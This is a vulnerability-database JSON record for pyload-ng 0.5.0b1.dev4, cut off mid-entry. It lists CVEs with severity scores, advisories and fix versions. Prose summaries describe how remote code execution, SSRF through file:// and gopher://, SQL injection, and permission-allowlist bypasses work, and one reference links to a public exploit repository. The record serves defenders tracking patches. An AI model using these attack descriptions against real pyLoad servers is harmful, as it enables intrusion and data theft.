{"url":"http://public2.vulnerablecode.io/api/packages/81661?format=json","purl":"pkg:pypi/pyload-ng@0.5.0b1.dev4","type":"pypi","namespace":"","name":"pyload-ng","version":"0.5.0b1.dev4","qualifiers":{},"subpath":"","is_vulnerable":true,"next_non_vulnerable_version":"0.5.0b3.dev36","latest_non_vulnerable_version":"0.20","affected_by_vulnerabilities":[{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/46404?format=json","vulnerability_id":"VCID-1vbk-b2hr-tydh","summary":"An issue in pyload-ng v0.5.0b3.dev85 running under python3.11 or below allows attackers to execute arbitrary code via a crafted HTTP request.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2024-39205","reference_id":"","reference_type":"","scores":[{"value":"0.83924","scoring_system":"epss","scoring_elements":"0.99316","published_at":"2026-06-11T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2024-39205"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2024-39205","reference_id":"CVE-2024-39205","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"9.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2024-39205"},{"reference_url":"https://github.com/advisories/GHSA-h95x-26f3-88hr","reference_id":"GHSA-h95x-26f3-88hr","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"9.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-h95x-26f3-88hr"},{"reference_url":"https://github.com/advisories/GHSA-r9pp-r4xf-597r","reference_id":"GHSA-r9pp-r4xf-597r","reference_type":"","scores":[{"value":"CRITICAL","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-r9pp-r4xf-597r"},{"reference_url":"https://github.com/pyload/pyload/security/advisories/GHSA-r9pp-r4xf-597r","reference_id":"GHSA-r9pp-r4xf-597r","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"9.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2024-10-30T20:48:52Z/"}],"url":"https://github.com/pyload/pyload/security/advisories/GHSA-r9pp-r4xf-597r"},{"reference_url":"https://github.com/Marven11/CVE-2024-39205-Pyload-RCE/tree/main","reference_id":"main","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2024-10-30T20:48:52Z/"}],"url":"https://github.com/Marven11/CVE-2024-39205-Pyload-RCE/tree/main"},{"reference_url":"https://github.com/pyload/pyload","reference_id":"pyload","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"9.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2024-10-30T20:48:52Z/"}],"url":"https://github.com/pyload/pyload"}],"fixed_packages":[],"aliases":["CVE-2024-39205","GHSA-r9pp-r4xf-597r"],"risk_score":10.0,"exploitability":"2.0","weighted_severity":"9.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-1vbk-b2hr-tydh"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/71755?format=json","vulnerability_id":"VCID-37r9-s7me-ubf1","summary":"pyLoad is a free and open-source download manager written in Python. In 0.5.0b3.dev96 and earlier, the parse_urls API function in src/pyload/core/api/__init__.py fetches arbitrary URLs server-side via get_url(url) (pycurl) without any URL validation, protocol restriction, or IP blacklist. An authenticated user with ADD permission can make HTTP/HTTPS requests to internal network resources and cloud metadata endpoints, read local files via file:// protocol (pycurl reads the file server-side), interact with internal services via gopher:// and dict:// protocols, and enumerate file existence via error-based oracle (error 37 vs empty response).","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-35187","reference_id":"","reference_type":"","scores":[{"value":"0.0004","scoring_system":"epss","scoring_elements":"0.12626","published_at":"2026-06-11T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-35187"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-35187","reference_id":"","reference_type":"","scores":[{"value":"7.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-35187"},{"reference_url":"https://github.com/pyload/pyload/commit/4032e57d61d8f864e39f4dcfdb567527a50a9e1f","reference_id":"4032e57d61d8f864e39f4dcfdb567527a50a9e1f","reference_type":"","scores":[{"value":"7.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-07T14:03:24Z/"}],"url":"https://github.com/pyload/pyload/commit/4032e57d61d8f864e39f4dcfdb567527a50a9e1f"},{"reference_url":"https://github.com/advisories/GHSA-2wvg-62qm-gj33","reference_id":"GHSA-2wvg-62qm-gj33","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-2wvg-62qm-gj33"},{"reference_url":"https://github.com/pyload/pyload/security/advisories/GHSA-2wvg-62qm-gj33","reference_id":"GHSA-2wvg-62qm-gj33","reference_type":"","scores":[{"value":"7.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-07T14:03:24Z/"}],"url":"https://github.com/pyload/pyload/security/advisories/GHSA-2wvg-62qm-gj33"}],"fixed_packages":[],"aliases":["CVE-2026-35187","GHSA-2wvg-62qm-gj33"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-37r9-s7me-ubf1"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/105650?format=json","vulnerability_id":"VCID-4e9n-1qw5-sucs","summary":"pyload is an open-source Download Manager written in pure Python. An unsafe JavaScript evaluation vulnerability in pyLoad’s CAPTCHA processing code allows unauthenticated remote attackers to execute arbitrary code in the client browser and potentially the backend server. Exploitation requires no user interaction or authentication and can result in session hijacking, credential theft, and full system remote code execution. Commit 909e5c97885237530d1264cfceb5555870eb9546, the patch for the issue, is included in version 0.5.0b3.dev89.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2025-53890","reference_id":"","reference_type":"","scores":[{"value":"0.0107","scoring_system":"epss","scoring_elements":"0.78148","published_at":"2026-06-11T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2025-53890"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2025-53890","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2025-53890"},{"reference_url":"https://github.com/pyload/pyload/pull/4586","reference_id":"4586","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2025-07-15T13:24:23Z/"}],"url":"https://github.com/pyload/pyload/pull/4586"},{"reference_url":"https://github.com/pyload/pyload/commit/909e5c97885237530d1264cfceb5555870eb9546","reference_id":"909e5c97885237530d1264cfceb5555870eb9546","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2025-07-15T13:24:23Z/"}],"url":"https://github.com/pyload/pyload/commit/909e5c97885237530d1264cfceb5555870eb9546"},{"reference_url":"https://github.com/advisories/GHSA-8w3f-4r8f-pf53","reference_id":"GHSA-8w3f-4r8f-pf53","reference_type":"","scores":[],"url":"https://github.com/advisories/GHSA-8w3f-4r8f-pf53"},{"reference_url":"https://github.com/pyload/pyload/security/advisories/GHSA-8w3f-4r8f-pf53","reference_id":"GHSA-8w3f-4r8f-pf53","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2025-07-15T13:24:23Z/"}],"url":"https://github.com/pyload/pyload/security/advisories/GHSA-8w3f-4r8f-pf53"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/378395?format=json","purl":"pkg:pypi/pyload-ng@0.20","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:pypi/pyload-ng@0.20"}],"aliases":["CVE-2025-53890","GHSA-8w3f-4r8f-pf53"],"risk_score":4.5,"exploitability":"0.5","weighted_severity":"9.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-4e9n-1qw5-sucs"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/71694?format=json","vulnerability_id":"VCID-4u3t-ct2r-ykc3","summary":"pyLoad is a free and open-source download manager written in Python. Prior to 0.5.0b3.dev97, the ADMIN_ONLY_CORE_OPTIONS authorization set in set_config_value() uses incorrect option names ssl_cert and ssl_key, while the actual configuration option names are ssl_certfile and ssl_keyfile. This name mismatch causes the admin-only check to always evaluate to False, allowing any user with SETTINGS permission to overwrite the SSL certificate and key file paths. Additionally, the ssl_certchain option was never added to the admin-only set at all. This vulnerability is fixed in 0.5.0b3.dev97.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-35586","reference_id":"","reference_type":"","scores":[{"value":"0.00023","scoring_system":"epss","scoring_elements":"0.06593","published_at":"2026-06-11T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-35586"},{"reference_url":"https://github.com/pypa/advisory-database/tree/main/vulns/pyload-ng/PYSEC-2026-123.yaml","reference_id":"","reference_type":"","scores":[{"value":"6.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/pypa/advisory-database/tree/main/vulns/pyload-ng/PYSEC-2026-123.yaml"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-35586","reference_id":"","reference_type":"","scores":[{"value":"6.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-35586"},{"reference_url":"https://github.com/pyload/pyload/security/advisories/GHSA-ppvx-rwh9-7rj7","reference_id":"GHSA-ppvx-rwh9-7rj7","reference_type":"","scores":[{"value":"6.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:N"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-04-07T18:16:06Z/"}],"url":"https://github.com/pyload/pyload/security/advisories/GHSA-ppvx-rwh9-7rj7"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/40238?format=json","purl":"pkg:pypi/pyload-ng@0.5.0b3.dev97","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-5tq7-5rr2-hke4"},{"vulnerability":"VCID-5v6x-k9wj-zybu"},{"vulnerability":"VCID-8hzh-53hk-6yaz"},{"vulnerability":"VCID-fygw-7zvj-h3d5"},{"vulnerability":"VCID-kjru-xrvh-1bad"},{"vulnerability":"VCID-kz5g-9as8-g7aw"},{"vulnerability":"VCID-nukv-bju1-auht"},{"vulnerability":"VCID-rynb-u84j-7khx"},{"vulnerability":"VCID-uwgh-ppsz-jyhz"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:pypi/pyload-ng@0.5.0b3.dev97"}],"aliases":["CVE-2026-35586","GHSA-ppvx-rwh9-7rj7","PYSEC-2026-123"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-4u3t-ct2r-ykc3"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/121404?format=json","vulnerability_id":"VCID-5jgf-dcg2-w7ed","summary":"pyLoad is the free and open-source Download Manager written in pure Python. Prior to version 0.5.0b3.dev91, the parameter add_links in API /json/add_package is vulnerable to SQL Injection. Attackers can modify or delete data in the database, causing data errors or loss. This issue has been patched in version 0.5.0b3.dev91.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2025-55156","reference_id":"","reference_type":"","scores":[{"value":"0.00212","scoring_system":"epss","scoring_elements":"0.43783","published_at":"2026-06-11T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2025-55156"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2025-55156","reference_id":"","reference_type":"","scores":[{"value":"7.8","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:H/SC:N/SI:N/SA:N/E:P"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2025-55156"},{"reference_url":"https://github.com/pyload/pyload/commit/134edcdf6e2a10c393743c254da3d9d90b74258f","reference_id":"134edcdf6e2a10c393743c254da3d9d90b74258f","reference_type":"","scores":[{"value":"7.8","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:H/SC:N/SI:N/SA:N/E:P"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2025-08-12T15:49:23Z/"}],"url":"https://github.com/pyload/pyload/commit/134edcdf6e2a10c393743c254da3d9d90b74258f"},{"reference_url":"https://github.com/pyload/pyload/blob/develop/src/pyload/core/database/file_database.py#L271","reference_id":"file_database.py#L271","reference_type":"","scores":[{"value":"7.8","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:H/SC:N/SI:N/SA:N/E:P"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2025-08-12T15:49:23Z/"}],"url":"https://github.com/pyload/pyload/blob/develop/src/pyload/core/database/file_database.py#L271"},{"reference_url":"https://github.com/advisories/GHSA-pwh4-6r3m-j2rf","reference_id":"GHSA-pwh4-6r3m-j2rf","reference_type":"","scores":[],"url":"https://github.com/advisories/GHSA-pwh4-6r3m-j2rf"},{"reference_url":"https://github.com/pyload/pyload/security/advisories/GHSA-pwh4-6r3m-j2rf","reference_id":"GHSA-pwh4-6r3m-j2rf","reference_type":"","scores":[{"value":"7.8","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:H/SC:N/SI:N/SA:N/E:P"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2025-08-12T15:49:23Z/"}],"url":"https://github.com/pyload/pyload/security/advisories/GHSA-pwh4-6r3m-j2rf"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/34145?format=json","purl":"pkg:pypi/pyload-ng@0.5.0b3.dev91","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-37r9-s7me-ubf1"},{"vulnerability":"VCID-4u3t-ct2r-ykc3"},{"vulnerability":"VCID-5tq7-5rr2-hke4"},{"vulnerability":"VCID-5v6x-k9wj-zybu"},{"vulnerability":"VCID-72ar-7tmw-ybcy"},{"vulnerability":"VCID-7uc5-ppjr-yqfj"},{"vulnerability":"VCID-865y-shjm-xqam"},{"vulnerability":"VCID-8hzh-53hk-6yaz"},{"vulnerability":"VCID-d7dw-6vnb-43a9"},{"vulnerability":"VCID-fygw-7zvj-h3d5"},{"vulnerability":"VCID-h7q7-gmbe-sbck"},{"vulnerability":"VCID-hcq5-zndz-uucx"},{"vulnerability":"VCID-kjru-xrvh-1bad"},{"vulnerability":"VCID-kz5g-9as8-g7aw"},{"vulnerability":"VCID-nukv-bju1-auht"},{"vulnerability":"VCID-rynb-u84j-7khx"},{"vulnerability":"VCID-uwgh-ppsz-jyhz"},{"vulnerability":"VCID-vfr2-7map-4bcp"},{"vulnerability":"VCID-wtub-vtcd-6uhc"},{"vulnerability":"VCID-xmf5-aqjt-tfhp"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:pypi/pyload-ng@0.5.0b3.dev91"}],"aliases":["CVE-2025-55156","GHSA-pwh4-6r3m-j2rf"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-5jgf-dcg2-w7ed"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/70568?format=json","vulnerability_id":"VCID-5tq7-5rr2-hke4","summary":"pyLoad is a free and open-source download manager written in Python. Prior to 0.5.0b3.dev100, the set_config_value() API method (@permission(Perms.SETTINGS)) in src/pyload/core/api/__init__.py gates security-sensitive options behind a hand-maintained allowlist ADMIN_ONLY_CORE_OPTIONS. The option (\"general\", \"ssl_verify\") is not on that allowlist. Any authenticated user with the non-admin SETTINGS permission can set general.ssl_verify = off, and every subsequent outbound pycurl request is made with SSL_VERIFYPEER=0 and SSL_VERIFYHOST=0 — TLS peer and hostname verification are fully disabled. An on-path attacker can then present forged certificates for any hostname pyload fetches. This is a direct continuation of the fix family CVE-2026-33509 / CVE-2026-35463 / CVE-2026-35464 / CVE-2026-35586, each of which patched a different missed option in the same allowlist. This vulnerability is fixed in 0.5.0b3.dev100.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-42312","reference_id":"","reference_type":"","scores":[{"value":"0.0002","scoring_system":"epss","scoring_elements":"0.05647","published_at":"2026-06-11T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-42312"},{"reference_url":"https://github.com/advisories/GHSA-4744-96p5-mp2j","reference_id":"","reference_type":"","scores":[{"value":"6.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-4744-96p5-mp2j"},{"reference_url":"https://github.com/advisories/GHSA-ppvx-rwh9-7rj7","reference_id":"","reference_type":"","scores":[{"value":"6.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-ppvx-rwh9-7rj7"},{"reference_url":"https://github.com/advisories/GHSA-r7mc-x6x7-cqxx","reference_id":"","reference_type":"","scores":[{"value":"6.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-r7mc-x6x7-cqxx"},{"reference_url":"https://github.com/advisories/GHSA-w48f-wwwf-f5fr","reference_id":"","reference_type":"","scores":[{"value":"6.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-w48f-wwwf-f5fr"},{"reference_url":"https://github.com/pypa/advisory-database/tree/main/vulns/pyload-ng/PYSEC-2026-126.yaml","reference_id":"","reference_type":"","scores":[{"value":"6.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/pypa/advisory-database/tree/main/vulns/pyload-ng/PYSEC-2026-126.yaml"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-42312","reference_id":"","reference_type":"","scores":[{"value":"6.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-42312"},{"reference_url":"https://github.com/advisories/GHSA-ccxc-x975-4hh9","reference_id":"GHSA-ccxc-x975-4hh9","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-ccxc-x975-4hh9"},{"reference_url":"https://github.com/pyload/pyload/security/advisories/GHSA-ccxc-x975-4hh9","reference_id":"GHSA-ccxc-x975-4hh9","reference_type":"","scores":[{"value":"6.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:N"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-05-11T18:50:26Z/"}],"url":"https://github.com/pyload/pyload/security/advisories/GHSA-ccxc-x975-4hh9"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/41381?format=json","purl":"pkg:pypi/pyload-ng@0.5.0b3.dev100","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:pypi/pyload-ng@0.5.0b3.dev100"}],"aliases":["CVE-2026-42312","GHSA-ccxc-x975-4hh9","PYSEC-2026-126"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-5tq7-5rr2-hke4"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/218410?format=json","vulnerability_id":"VCID-5v6x-k9wj-zybu","summary":"pyLoad is a free and open-source download manager written in Python. Prior to 0.5.0b3.dev100, when passing a folder name in the set_package_data() API function call inside the data object with key \"_folder\", there is no sanitization at all, allowing a user with Perms.MODIFY to specify arbitrary directories as download locations for a package. This vulnerability is fixed in 0.5.0b3.dev100.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-42315","reference_id":"","reference_type":"","scores":[{"value":"0.0006","scoring_system":"epss","scoring_elements":"0.19101","published_at":"2026-06-11T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-42315"},{"reference_url":"https://github.com/pyload/pyload/security/advisories/GHSA-838g-gr43-qqg9","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N"},{"value":"8.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/pyload/pyload/security/advisories/GHSA-838g-gr43-qqg9"},{"reference_url":"https://github.com/pypa/advisory-database/tree/main/vulns/pyload-ng/PYSEC-2026-129.yaml","reference_id":"","reference_type":"","scores":[{"value":"8.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/pypa/advisory-database/tree/main/vulns/pyload-ng/PYSEC-2026-129.yaml"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-42315","reference_id":"","reference_type":"","scores":[{"value":"8.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-42315"},{"reference_url":"https://github.com/advisories/GHSA-838g-gr43-qqg9","reference_id":"GHSA-838g-gr43-qqg9","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-838g-gr43-qqg9"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/41381?format=json","purl":"pkg:pypi/pyload-ng@0.5.0b3.dev100","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:pypi/pyload-ng@0.5.0b3.dev100"}],"aliases":["CVE-2026-42315","GHSA-838g-gr43-qqg9","PYSEC-2026-129"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-5v6x-k9wj-zybu"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/57553?format=json","vulnerability_id":"VCID-64ux-jb56-gub5","summary":"pyLoad is a free and open-source Download Manager. The folder `/.pyload/scripts` has scripts which are run when certain actions are completed, for e.g. a download is finished. By downloading a executable file to a folder in /scripts and performing the respective action, remote code execution can be achieved in versions prior to 0.5.0b3.dev87. A file can be downloaded to such a folder by changing the download folder to a folder in `/scripts` path and using the `/flashgot` API to download the file. This vulnerability allows an attacker with access to change the settings on a pyload server to execute arbitrary code and completely compromise the system. Version 0.5.0b3.dev87 fixes this 